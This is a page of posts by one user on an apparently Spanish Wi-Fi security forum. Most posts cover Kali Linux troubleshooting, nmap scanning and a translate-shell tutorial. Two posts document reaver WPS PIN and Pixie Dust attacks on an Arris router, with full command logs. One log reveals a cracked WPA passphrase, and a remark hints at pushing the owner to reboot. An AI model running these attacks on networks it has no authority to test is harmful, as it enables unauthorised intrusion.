El libre pensamiento para un internet libre

No estas registrado.  

#1 Re: Las herramientas para WPS » Documentación y soporte para reaver 1.6.1 y versiones posteriores » 10-05-2019 19:10:11

No, no me ha molestado para nada. Siento haberte dado esa impresión.
Has probado Reaver desde otro dispositivo contra ese mismo router con éxito? O has probado desde la RPI a otro router con éxito? Podría ser que sea el router no permita la prueba de pines por motivos de seguridad.
Creo que es mejor que pegues aquí el código resultante de lo que hagas en vez de subirlo a algún sitio. Es más cómodo verlo aquí. Solo pégalo como código para que no ocupe mucho espacio y sea facilemte legible.

#2 Re: Las herramientas para WPS » Documentación y soporte para reaver 1.6.1 y versiones posteriores » 10-05-2019 14:01:50

Fenix_22 escribió:

Y con tus últimas líneas quieres decir que ahí es donde debo seguir mis futuras respuestas?

No. Solo lo comentaba por si le querias echar un vistazo.

#3 Re: Las herramientas para WPS » Documentación y soporte para reaver 1.6.1 y versiones posteriores » 10-05-2019 12:02:45

Hola Fenix_22 y bienvenido al foro.

Para que se te pueda ayudar mejor seria necesario que pegues aqui el comando que usas con reaver y la salida del mismo, con la opcion -vvv para que sea lo mas verboso posible.

Dicho esto, yo tuve un problema similar auditando desde un router y no recuerdo si tambien el probelma se me extendia a mi raspberry. Lo solucione con la opcion -N de reaver.

Este es el post donde se habla del tema:

https://www.wifi-libre.com/topic-1149-r … r3600.html

#4 Re: Herramientas para hacking ético » Reconocimiento de Puerto Personalizado en un Gateway » 02-05-2019 12:35:42

Hola.

Supongo que la unica manera seria escaneando los puertos del router para saber que puertos estan a la escucha y una vez que sepas cuales son los abiertos, ver que servicios estan corriendo detras de esos puertos.

Pienso que la solucion mas sencilla seria con nmap. Para escanear todos los puertos con nmap  puedes hacerlo asi:

nmap -p 1-65535  ip_del_router

Para ver que servicio corre detras del puerto que esta abierto, puedes hacer esto:

nmap -p puerto_abierto -sV ip_del_router

Y si quieres hacerlo todo de una (tardara mucho), puedes hacer

namp -sV -p 1-65535 ip_del_router

#5 Re: Herramientas wifi » Script multiuso wifi para Kali y otras distros » 16-04-2019 23:02:28

Muchas gracias. Por quitarme el gusanillo me abri un kali y comence a probar airgeddon. Se le ve bien completo. En cuanto pueda lo pruebo en mi rpi y ya te comento si truena por algun lado.

#6 Re: Herramientas wifi » Script multiuso wifi para Kali y otras distros » 16-04-2019 22:15:24

Que gran proyecto y que buena noticia que sacaste la version "headless_tmux"!!

Por desgracia no doy con ella. La retiraste o es mi supina torpeza en github? me gustaria probarla pero no la encuentro.

Muchas gracias.

#7 Re: Noticias Kali linux, asesoramiento instalación y asuntos de compatibildades » Error de inicio en entorno gráfico » 31-03-2019 11:41:07

Hunter310# escribió:

La salida para el código que dijiste:

cat /etc/X11/default-display-manager
Es:

/usr/sbin/gdm3

Siendo asi no tienes lightdm como gestor de sesion predeterminado, sigues con gdm3.

Si quieres quitarte la duda de si funcionaria lightdm (y arranque el entorno grafico) con el kernel nuevo, debes hacer:

dpkg-reconfigure lightdm

Y si te pide alguna interaccion, selecciones lightdm y listo. luego reinicias y ya deberia entrar lightdm como gestor de sesion. Si no te gusta lightdm y prefieres gdm3 (el que tienes ahora), haces:

dpkg-reconfigure gdm3

si te pide interaccion, seleccionas gdm3 y listo. con eso deberia valer.

#8 Re: Noticias Kali linux, asesoramiento instalación y asuntos de compatibildades » Error de inicio en entorno gráfico » 29-03-2019 20:07:53

Si los archivos no aparecen en el escritorio, pero si en la terminal, quiza no estes en el escritorio del usuario que crees que estas. no le encuentro mucha mas logica. todo deberia aprecer igual con un kernel que con el otro.

Si quieres intentar lo de restaurar la carpeta X11, te digo como lo puedes hacer desde la consola sin riesgo.

Arranca el sistema con el kernel que funciona, y en la terminal como root o superuser:

mv /etc/X11/ /etc/X11.bk/

De esta manera ya has hecho una copia de X11 y has borrado el X11 original. Luego arrancas en modo consola, y desde la consola otra vez como root o superuser:

rm -r /etc/X11/
cp /etc/X11.bk/ /etc/X11/ 

Asi habras borrado X11 si se ha vuelto a generar, y habras restaurado X11 que si servia. Y luego sin reiniciar, startx.

Dices que instalaste lightdm y no has notado ningun cambio? eso tambien esta raro. Deberia haber cambiado la pantalla de login al menos. muestrame la salida de:

cat /etc/X11/default-display-manager

#9 Re: Noticias Kali linux, asesoramiento instalación y asuntos de compatibildades » Error de inicio en entorno gráfico » 29-03-2019 18:13:32

Al parecer hubo algunos problemas con el kernel que funciona porque ya no me muestra algunos de los archivos que tengo pero que aun estan presentes en el kernel defectuoso.

a que te refieres con esto? archivos tuyos? no deberia pasar algo asi.

Cuando dices que reinstalar xserver-xorg no funciono, a que re refieres? reinstalo xserver-xorg y luego al reiniciar siguio son funcionar? o te dio algun error al tratar de reinstalarlo? trata de especificar mas en tus comentarios por favor.

viendo el log del error, no se me ocurre nada mas que googlear los errores que te da (son los que salen con (EE) en cada  linea). Y si tienes suerte, rapidamente encontraras la solucion.

Creo recordar que en tiempos del malogrado xorg.conf, este archivo se generaba en cada inicio. Tuve un problema hace mucho tiempo similar, que no iniciaban la X, y lo solucione haciendo un peque;o script que me restauraba un xorg.conf que funcionaba a cada inicio. Esto me da que pensar que quiza se podria acorralar el fallo restaurando toda la carpeta /etc/X11/ que no funciona por la /etc/X11/ que si funciona, y si llegan a funcionar las X, mirar las diferencias de los archivos y ver con mas claridad donde esta tronando, pero quiza sea un disparo al aire que no vaya a ningun sitio y si comentes un error borrando /etc/X11/ o alguno de sus archivos es posible que el problema se complique mucho mas.

Quiza lo mas sencillo sea que vivas con el kernel antiguo, que no notaras diferencias y esperar a futuras actualizaciones de kernel que con suerte ya no sufriras este contratiempo. Hay varios metodos que puedes usar para no tener que tocar grub (pantalla de boot) cada vez que inicies. Puedes hacerlo a traves de la config de grub, o desisntalando el kernel que te da problemas. Yo optaria por configurar grub para que siempre arranque con el kernel anterior.

Quiza sea por algo que has instalado o algo que has tocado, o algun repositorio que hayas a;adido, o quien sabe. Es raro que el problema no este reportado si la culpa fuera solamente del kernel nuevo. Vuelvo a lo dicho. Kali es para lo que es y cuanto menos se trastee fuera de lo que es, mejor. Es mi opinion.

Quiza algun compa;ero pueda a;adir algo mas de luz y encontrar una solucion mas sencilla.

saludos

#10 Re: Noticias Kali linux, asesoramiento instalación y asuntos de compatibildades » Error de inicio en entorno gráfico » 28-03-2019 21:04:45

Me alegro que se haya resuelto (o casi). Son cosas que a veces pasan.

Quiza iniciando con el kernel moderno, y reinstalando xserver-xorg (en otro mensaje te dije como hacerlo) se te solucione y puedas trabajar con el ultimo kernel.

Por otro lado, ya puedes vivir sin tocarle mas. Puedes arrancar solo con el kernel que funciona y listo. no vas a notar la diferencia, y quiza la proxima actualizacion de kernel y no te de estos problemas.

Si quieres seguir tirando del hilo a ver que ha pasado, postea el archivo /var/log/Xorg.1.log como dice kcdtv, pegandolo y formateandolo como codigo para poder leerlo facilmente. antes te pedia fotos por la dificultad de hacer un copy/paste desde solo la consola.

#11 Re: Noticias Kali linux, asesoramiento instalación y asuntos de compatibildades » Error de inicio en entorno gráfico » 27-03-2019 17:39:22

Si hiciste una instalacion en tu disco duro, debes tener un usuario creado, no? que pasa si haces startx logueado con ese usuario? lo mismo?

Al hacer startx como root nos remite a un archivo donde dice contener mas info sobre el fallo.

Nos manda al archivo /var/log/Xorg.1.log. Seria bueno ver ese archivo. Si es demasiado largo como para hacerle una foto porque no quepa en la pantalla, puedes usar more de esta manera:

cat /var/log/Xorg.1.log | more

.

Llegados a este punto y sabiendo que el problema es por xorg, puedes reinstalarlo a ver si sonara la flauta

apt-get install --reinstall xserver-xorg 

Esto dando por hecho que dispones a una conexion a internet, si no la tienes, puedes conectarte con un cable rj45 directamente, o con nmtui-connect desde la consola para configurar una conexion wifi.

Tambien puedes intentar con otro gestor de inicio de sesion, como lightdm a ver si al menos te abre la pantalla de inicio de sesion. Siempre puedes volver a gdm3 sin mayor problema si no te gusta

apt-get install lightdm

y luego reiniciar. Si sale alguna pantalla en la que tengas que elegir alguna opcion, elige lightdm y acepta.

No se el boot de kali si te permite iniciar con alguna version de kernel mas antigua que tengas instalado de una manera sencilla, si es asi, prueba otra version de kernel al inicio tambien.

#12 Re: Noticias Kali linux, asesoramiento instalación y asuntos de compatibildades » Error de inicio en entorno gráfico » 27-03-2019 04:08:47

No creo que sea buena idea usar kali-linux como sistema principal o sistema en el que guardar informacion importante que no se quiera perder, maxime si no tienes conocimientos de linux. Kali es para lo que es, ni mas ni menos. Tienes muchas opciones si quieres un sistema linux para usarlo de escritorio que no te dara ni la mitad de problemas que kali. Repito.. Kali es para lo que es. Mi consejo siempre es usar kali en maquina virtual, pero para gustos, colores.

Dicho esto, no te preocupes. Toda tu informacion sigue en el sistema, es recuperable y tambien puedes recuperar tu entorno grafico. Con la poca informacion que nos brindas, poco se puede hacer. Imagino que has googleado tu problema y ya habras intentado algo. que has intentado y cuales han sido los resultados?

Dices que no llega ni a la pantalla de login, por lo que parece que ha tronado el gestor de inicio de sesion. No arranca y no sabemos si sea por tu tarjeta grafica o por algo en la actualizacion. Aparte de lo que te dice kcdtv, estaria bueno mandaras unas fotos de la salida de los siguientes comandos (las fotos con el texto completo y legible)

startx
lspci

No recuerdo ahora que gestor de inicio de sesion usa kali, si gdm3 o lightdm o algun otro. Puedes probar intentar recuperarlo tambien con

dpkg-reconfigure gdm3

y/o

dpkg-reconfigure lightdm

Con los datos que nos brinden los comandos que te decimos, sera mas facil hacer un diagnostico y dar con el problema y su solucion.

#13 Re: Otras marcas » Configurar antena Ubiquiti loco M5 a proveedor megacable. » 21-03-2019 01:31:16

Cierto es que por norma general la puerta de enlace suele terminar en 1, pero en el caso de Mexico, es mas habitual que usen la 254 (Mexico is diferent).

Yo dispongo de una conexion con Telmex ahora y tuve megacable hace tiempo, y mi puerta de enlace termina con Telmex y terminaba con Megacable en 254, pero supongo que dependera tambien del modem/router que te proporcieone tu ISP, megacable en este caso.

De todos modos, en propiedades de la conexion, o si no recuerdo mal, con el comando ipconfig /all, ya deberia salir en caso de windows. Y en el caso de linux, con el comando arp -a,  o con traceroute.

#14 Re: Captura del handshake y preguntas generales » Crack WPA-PMKID con aircrack-ng 1.4 (y futuras versiones) » 08-03-2019 16:31:07

Muy buena sugerencia y que bueno que te lo hayan aceptado y lo hayan implementado.

Cuando escribiste la primera entrada de este post, con la version de aircrack-ng con soporte para pmkid, lo probe por curiosidad y no pude hacerlo funcionar (creo recordar que me tiraba algun error al instalar el .deb), en un debian puro (no derivados tipo kali, ubuntu o similares). No le dedique mucho tiempo, pues prisa no hay y mas bien decidi esperar por si era cosa de que estaba la version recien salidita del horno y aun no estaba optimizada.

Ahora ya veo que en los repositorios tenemos la version 1.5.2 ya con pmkid implementado. No se si estara o no implementada la sugerencia tuya. Por fin ya tengo la auditoria de pmkid de manera sencilla. Nunca pude hacer correr hashcat en mi maquina por la dichosa nvidia optimus.

En cuanto tenga un rato pruebo a ver si todo va como debe ir.

#15 Re: Presentaciones » Encantado de formar farte de esta comunidad!! » 22-02-2019 17:42:21

Welcome xboxer4life

kcdtv escribió:

Con el spam-pirateo de topic casi se me olvidó saludarte... tongue

lol lol

#16 Re: Programas en general... » Translate-shell. Traductor en la consola. » 22-02-2019 17:38:17

kcdtv escribió:

Me suena de algo...  big_smile Translate Shell: El traductor para consola Lnux

roll roll roll

lol lol lol No hay quien se te adelante.

Para la proxima echare un vistazo para que no sea que repita de nuevo. Sorry

#17 Programas en general... » Translate-shell. Traductor en la consola. » 21-02-2019 21:46:56

javierbu
Respuestas: 2

Muy buenas.

Hoy me he topado con un proyecto que desconocia, y me ha parecido tan interesante que me he animado a escribir esta entrada.

Se trata del traductor de google en tu consola.

La pagina del proyecto: https://github.com/soimort/translate-shell

En la pagina del proyecto dicen que sirve tambien para mac OS, FreeBSD, y Microsoft Windows. Yo solo lo he probado en linux (debian)

Se puede instalar desde los repositorios oficiales (sin a;adir fuentes adicionales), al menos desde debian, que es lo que yo uso. Desconozco el resto de distribuciones si lo tienen en sus repos.

Instalacion:

Primero lo instale desde los repositorios, y la verdad no me funciono debidamente, asi que me fui a su pagina en github y me entretuve un poco leyendo.

Lo descargue, compile e instale, y seguia sin funcionar del todo bien, asi que volvi a la pagina de github y me entretuve un poco mas leyendo (la importancia de leer la documentacion de los desarrolladores)

Instale todas las dependencias que proponen en el proyecto, aunque seguro hay algunas que no hagan falta y mas de una ya estara instalada en  nuestro sistema:

sudo apt install libfribidi0 libfribidi-bin espeak rlwrap aspell fonts-freefont-otf fonts-freefont-ttf curl awk

Luego se descarga el proyecto, se compila y se instala:

git clone https://github.com/soimort/translate-shell
cd translate-shell/
make
sudo make install

Y ahora si, ya tenemos nuestro traductor de consola instalado y funcional.

Como dicen en su pagina, detecta automaticamente el idioma de tu sistema, por lo que no hay que indicarle el idioma en el que quieres traducir, si lo quieres traducir a tu idioma.

Usandolo sin argumento ninguno, nos traducira lo que le digamos, y nos dira otras acepciones de la palabra/texto traducido, aparte de que nos dara la traduccion de una manera detallada:

[email protected]:/$ trans hello
hello
/heˈlō,həˈlō/

Hola

Definiciones de hello
[ English -> Español ]

interjección
    ¡Hola!
        Hello!, Hi!, Hey!, Hullo!, Hallo!, Hoy!
    ¡Caramba!
        Gee!, Well!, Good gracious!, Well I never!, By jingo!, By gum!
    ¡Oiga!
        Listen!, Hello!, Hullo!, Hallo!, I say!, See here!
    ¡Diga!
        Hello!, Hullo!, Talk away!
    ¡Bueno!
        Well!, All right!, Hello!, Hallo!, Hullo!
    ¡Vale!
        Okay!, O.K.!, OK!, Okey!, Hello!
    ¡Aló!
        Hello!, Hullo!, Halliard!

hello
    Hola, ¡Hola
[email protected]:/$ 

con la opcion -b nos dara la traduccion mas relevante.

[email protected]:/$ trans -b hello
Hola
[email protected]:/$ 

Para traducir a otro idioma, o si no nuestro sistema no estuviera en el idioma en el que queremos la traduccion, usaremos primero la opcion -R para ver los idiomas disponibles y sus respectivos codigos a usar:

[email protected]:/$ trans -R
┌───────────────────────┬───────────────────────┬───────────────────────┐
│ Afrikaans      -   af │ Hebrew         -   he │ Portuguese     -   pt │
│ Albanian       -   sq │ Hill Mari      -  mrj │ Punjabi        -   pa │
│ Amharic        -   am │ Hindi          -   hi │ Querétaro Otomi-  otq │
│ Arabic         -   ar │ Hmong          -  hmn │ Romanian       -   ro │
│ Armenian       -   hy │ Hmong Daw      -  mww │ Russian        -   ru │
│ Azerbaijani    -   az │ Hungarian      -   hu │ Samoan         -   sm │
│ Bashkir        -   ba │ Icelandic      -   is │ Scots Gaelic   -   gd │
│ Basque         -   eu │ Igbo           -   ig │ Serbian (Cyr...-sr-Cyrl
│ Belarusian     -   be │ Indonesian     -   id │ Serbian (Latin)-sr-Latn
│ Bengali        -   bn │ Irish          -   ga │ Sesotho        -   st │
│ Bosnian        -   bs │ Italian        -   it │ Shona          -   sn │
│ Bulgarian      -   bg │ Japanese       -   ja │ Sindhi         -   sd │
│ Cantonese      -  yue │ Javanese       -   jv │ Sinhala        -   si │
│ Catalan        -   ca │ Kannada        -   kn │ Slovak         -   sk │
│ Cebuano        -  ceb │ Kazakh         -   kk │ Slovenian      -   sl │
│ Chichewa       -   ny │ Khmer          -   km │ Somali         -   so │
│ Chinese Simp...- zh-CN│ Klingon        -  tlh │ Spanish        -   es │
│ Chinese Trad...- zh-TW│ Klingon (pIqaD)tlh-Qaak Sundanese      -   su │
│ Corsican       -   co │ Korean         -   ko │ Swahili        -   sw │
│ Croatian       -   hr │ Kurdish        -   ku │ Swedish        -   sv │
│ Czech          -   cs │ Kyrgyz         -   ky │ Tahitian       -   ty │
│ Danish         -   da │ Lao            -   lo │ Tajik          -   tg │
│ Dutch          -   nl │ Latin          -   la │ Tamil          -   ta │
│ Eastern Mari   -  mhr │ Latvian        -   lv │ Tatar          -   tt │
│ Emoji          -  emj │ Lithuanian     -   lt │ Telugu         -   te │
│ English        -   en │ Luxembourgish  -   lb │ Thai           -   th │
│ Esperanto      -   eo │ Macedonian     -   mk │ Tongan         -   to │
│ Estonian       -   et │ Malagasy       -   mg │ Turkish        -   tr │
│ Fijian         -   fj │ Malay          -   ms │ Udmurt         -  udm │
│ Filipino       -   tl │ Malayalam      -   ml │ Ukrainian      -   uk │
│ Finnish        -   fi │ Maltese        -   mt │ Urdu           -   ur │
│ French         -   fr │ Maori          -   mi │ Uzbek          -   uz │
│ Frisian        -   fy │ Marathi        -   mr │ Vietnamese     -   vi │
│ Galician       -   gl │ Mongolian      -   mn │ Welsh          -   cy │
│ Georgian       -   ka │ Myanmar        -   my │ Xhosa          -   xh │
│ German         -   de │ Nepali         -   ne │ Yiddish        -   yi │
│ Greek          -   el │ Norwegian      -   no │ Yoruba         -   yo │
│ Gujarati       -   gu │ Papiamento     -  pap │ Yucatec Maya   -  yua │
│ Haitian Creole -   ht │ Pashto         -   ps │ Zulu           -   zu │
│ Hausa          -   ha │ Persian        -   fa │                       │
│ Hawaiian       -  haw │ Polish         -   pl │                       │
└───────────────────────┴───────────────────────┴───────────────────────┘
[email protected]:/$ 

Y luego, con :[codigo de idioma] le diremos el idioma que queremos:

[email protected]:/$ trans -b :fr hello
Bonjour
[email protected]:/$

Podemos traducir archivos tambien, y darle un archivo a traducir y que nos de un archivo traducido:

[email protected]:/$ cat texto
hello world how are you
this is a translation test text for wifi-free.
[email protected]:/$
[email protected]:/$ trans -b -i texto
hola mundo como estas
Este es un texto de prueba de traducción para wifi gratis.
[email protected]:/$
[email protected]:/$ trans -b -i texto -o traducido
[email protected]:/$
[email protected]:/$ cat traducido 
hola mundo como estas
Este es un texto de prueba de traducción para wifi gratis.
[email protected]:/$ 

(Como buen traductor y mucha gente, no distingue bien entre libre y gratis)

Tenemos la opcion tambien de escuchar lo traducido, tanto como palabras sueltas, como archivos completos. Esta bastante divertido escuchar la voz artifical con la que traduce. Apenas se entiende, pero mola su voz robotica, nada que ver con la (sensual) voz que nos ofrece google translator, pero para ello deberies instalarlo y probarlo. la opcion es con -p

[email protected]:/$ trans -b -p -i texto

Existen muuuuuuchas mas opciones, muy bien explicadas en su github. Solo comparti estos pocos ejemplos. Si alguien quiere saber hasta donde llega la madriguera del conejo, ya sabe lo que tiene que hacer.

Saludos!!

#18 Re: Preguntas generales y busqueda de nuevas brechas » WPS muere despues de que pixie me regale el PIN » 12-02-2019 08:58:09

Concuerdo que no es ningun mecanismo de seguridad, sino una mala configuracion del WPS, o incluso un error puntual de este aparato en concreto, ya que es bastante extra;o lo que pasa.

He vuelto a tener acceso al susodicho router y estas son las conclusiones:

pimer contacto y lo que nos cuenta airodump:

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH WPS     ESSID
                                                                                                                                      
 2C:7E:81:XXXXX  -70       18        1    0   1   54  WPA2 CCMP   PSK  2.0     ARRIS-XXXX                                         
                                                                                                                                      
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe   

Vemos que dice tener wps 2.0 activado

salida de wash -j -s

{"bssid" : "2C:7E:81:XXXXX", "essid" : "ARRIS-XXXX", "channel" : 1, "rssi" : -70, "vendor_oui" : "000C43", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Ralink Technology, Corp.", "wps_model_name" : "Ralink Wireless Access Point", "wps_model_number" : "RT2860", "wps_device_name" : "ARRIS_24GAP", "wps_serial" : "12345678", "wps_uuid" : "bc329e001dd811b286012c7e81fad752", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "9100", "wps_rf_bands" : "01", "dummy": 0}

Pasando reaver con el PIN que nos dio en nuestro ultimo encuentro:

[[email protected] ~]# reaver -i wlan1mon -p 16866263 -c 1 -b 2C:7E:81:XXXXXX -vv -N

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1mon to channel 1
[+] Waiting for beacon from 2C:7E:81:XXXXXX
[+] Received beacon from 2C:7E:81:XXXXXX
[+] Vendor: RalinkTe
[+] Trying pin "16866263"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 2C:7E:81:XXXXXX (ESSID: ARRIS-XXXXXX)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '16866263'
[+] WPA PSK: '2WC456401657'
[+] AP SSID: 'ARRIS-XXXX'
[+] Nothing done, nothing to save.

Nos da la llave. Estaba seguro que pasaria esto.

Despues de esto, airodump sigue dando el mismo resultado que antes, es decir, sigue diciendo que WPS esta activo. Wash sigue dando el mismo resultado tambien. Sigue capturando el probe.

Vuelvo a pasar reaver para explotar pixie....

[email protected] ~]# reaver -i wlan1mon -K -c 1 -b 2C:7E:81:XXXXXX -vv -N

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1mon to channel 1
[+] Waiting for beacon from 2C:7E:81:XXXXXX
[+] Received beacon from 2C:7E:81:XXXXXX
[+] Vendor: RalinkTe
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 2C:7E:81:XXXXXX (ESSID: ARRIS-XXXX)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
^C
[+] Nothing done, nothing to save.

Ahi se queda atascado....

Vuelvo a pasara airodump...

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH WPS     ESSID
                                                                                                                                      
 2C:7E:81:XXXXXX  -69        6        0    0   1   54  WPA2 CCMP   PSK  0.0     ARRIS-XXXX                                          
                                                                                                                                      
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                       

Y wash ya no agarra el probe.

WPS is dead!!

Cualquier intento (sacar PIN o usar el PIN que nos dio hace un rato la llave con reaver) esta es la salida:

[[email protected] ~]# reaver -i wlan1mon -p 16866263 -c 1 -b 2C:7E:81:XXXXXX -vv -N

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1mon to channel 1
[+] Waiting for beacon from 2C:7E:81:XXXXXX
[+] Received beacon from 2C:7E:81:XXXXXX
[+] Vendor: RalinkTe

Y ahi se queda por los siglos de los siglos hasta nuevo reinicio

Conclusiones?

No se que pensar. Quiza sea un error concreto de este dispositivo concreto. Si me vuelvo a cruzar con algo similar, ya podria decir que es un error del modelo concreto, pero todo esta muy raro.

#19 Re: Hacking wireless ético: Los métodos alternativos » Hostbase 1.2 está aqui » 07-02-2019 21:00:05

Mis respetos por tu trabajo Koala. Sabes que tienes un admirador en mi persona.

Por desgracia tampoco puedo aportar mucho a tu proyecto por mis conocimientos y porque cuando tengo tiempo para hacer alguna cosilla, lo enfoco en mi propio proyecto con el que trato de ir aprendiendo poco a poco.

Si te ayuda, te comento algunas ideas que ya te he comentado en alguna ocasion y creo que harian de hostbase algo mas sencillo y ordenado. Espero no te molestes con mis comentarios, pero francamente creo que mejoraria notablemente:

- No tener que llevartelo todo a /tmp/ para ejecutarlo. No le encuentro ningun sentido a esto y sí algo molesto y confuso. Considero mas sencillo ejecutarlo desde la misma carpeta del proyecto.
- No tener que colocar las carpetas de los templates en /etc/. creo  recordar que habia que colocarlas ahi, y tampoco le encuentro ningun sentido a esto, y sí confusion y desorden en el sistema donde ejecutas hostbase. Considero mas sencillo que en la carpeta del proyecto ya hubiera una carpeta "templates" que no haya que llevarsela a ningun sitio.
- Una vez que tienes la llave WPA, parar el ataque. Tampoco le veo sentido a que el ataque siga en curso, al menos tal y como es ahora mismo hostbase.
- Ordenar un poco tu github. No se el estado en el que este ahora, pero cuando yo lo probe, la verdad es que resultaba un poco confuso por las distintas versiones.

En cuanto tenga un rato, probare la nueva version y si se me ocurre algo nuevo, te comento.

Quiza si te ayuda, si pueda testear algunas cosas e incluso hacer un video usandolo y explicando un poco el proceso.

Como te digo, espero que mis comentarios no te molesten y los tengas en cuenta.

Concuerdo contigo que hostbase esta muy infravalorado y muy poco conocido. Por lo que se, sigue siendo el unico en su especie y seria muy bueno alzarlo al lugar que se merece.

#20 Preguntas generales y busqueda de nuevas brechas » WPS muere despues de que pixie me regale el PIN » 07-02-2019 20:32:45

javierbu
Respuestas: 4

Hola.

Hace un par de semanas estando en la ofi de un amiguete donde tiene algunos routers, estuvimos auditandolos. Uno de ellos, un arris (aqui en mexico arris es casi sinonimo de vulnerable a pixie y marca casi favorita de uno de los grandes ISPs de por aqui), enseguida me arrojo el PIN WPS, pero al intentar sacar la llave con el PIN, el WPS parecia muerto. Digo parecia porque agarraba el probe, sacaba el vendor del chipset, y ahi se quedaba perpetuamente. En ese momento y sin meterme mucho mas en el tema, lo achaque a la distancia a la que  podria estar el router siempre pensando que es completamente vunerable. Cabe recalcar que al volver a intentar sacar de nuevo el PIN, tampoco habia mas conversacion entre reaver y el router que la marca del chipset.

Probando el PIN que reaver me habia dado hacia unos segundos:

[[email protected] ~]# reaver -i wlan1mon -p XXXXXXXX -c 11 -b 2C:7E:81:XX:XX:XX -vv -N

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1mon to channel 11
[+] Waiting for beacon from 2C:7E:81:XX:XX:XX
[+] Received beacon from 2C:7E:81:XX:XX:XX
[+] Vendor: RalinkTe

Volviendo a intentar sacar el PIN que me habia hacia escasos minutos con el mismo comando:

[[email protected] ~]# reaver -i wlan1mon -K -c 11 -b 2C:7E:81:XX:XX:XX -vv -N

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1mon to channel 11
[+] Waiting for beacon from 2C:7E:81:XX:XX:XX
[+] Received beacon from 2C:7E:81:XX:XX:XX
[+] Vendor: RalinkTe

Ayer estuvimos de nuevo en la oficina de mi amiguete, y volvimos a intentarlo (las capturas de codigo que adjunto son de ayer). De nuevo me arrojo el PIN, y de nuevo se quedo reaver estancado sin mas comunicacion con el router que el vendor del chipset.

El caso es que ya ayer me interese algo mas e hice algunas cosas. Pudimos ponernos a pocos metros del router (la culpa ya no era de la distancia). No pude capturar ningun probe con wash, y  Airodump con la opcion --wps no dice que WPS estuviera activo. Recordemos que hacia pocos minutos que me habia dado el PIN con reaver.

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH        UPTIME  WPS     ESSID
2C:7E:81:XX:XX:XX  -63       25        0    0  11   54  WPA2 CCMP       1d 18:41:54  0.0     ARRIS-XXXX 

Desgraciadamente no pudimos reiniciarlo por no dejar sin internet a los trabajadores, pero de momento y a falta de poder probar mas a fondo, mi conclusion es que una vez le sacas el PIN con reaver, el WPS muere por completo.

No se si se trate de alguna medida de seguridad, pero no le encuentro mucho sentido ya que esty seguro que una vez reiniciado, me escupa la llave con el PIN que ya tengo, y hay maneras de hacer que el usuario opte por el reinicio del router.

No se si esto es algo ya documentado, pero para mi es la primera vez que lo veo, y mas en routers que a priori son vulnerables completamente. Es el primer arris que veo que pasa esto, y he visto unos cuantos.

Espero en unos dias volver a poder interactuar con este aparato, y ya tratare de sacarle un probe con wash y ver que dice airodump sobre el estado del WPS antes de probar a colarle el PIN que me dio ayer.

